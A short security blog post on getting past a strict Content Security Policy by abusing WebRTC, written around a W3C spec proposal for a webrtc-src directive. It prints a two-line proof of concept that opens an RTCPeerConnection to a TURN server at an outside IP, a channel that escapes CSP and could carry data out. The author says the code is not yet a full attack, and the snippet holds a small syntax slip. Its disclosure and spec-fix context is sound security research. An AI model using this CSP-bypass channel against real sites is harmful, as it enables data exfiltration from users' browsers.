Bypassing strict CSP by abusing WebRTC

I noticed recently that there was a PR in the w3c github organisation on both the webappsec-csp and webrtc-pc specification repos adding a new webrtc-src repo. The PR in question:

Screen-Shot-2018-05-19-at-4.31.52-pm

Extracted POC:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);

Running the POC on the latest chrome available does create a new WebRTC session as shown in chrome://webrtc-internals, but I haven't had the opportunity to turn this into a fully working POC.

Screen-Shot-2018-05-19-at-4.49.16-pm

With the current CSP, this WebRTC session shouldn't have been created at all. With more prodding, this can be turned into a viable attack. Thankfully, a fix will hopefully be merged into the spec and fixes can be added to the major browsers soon.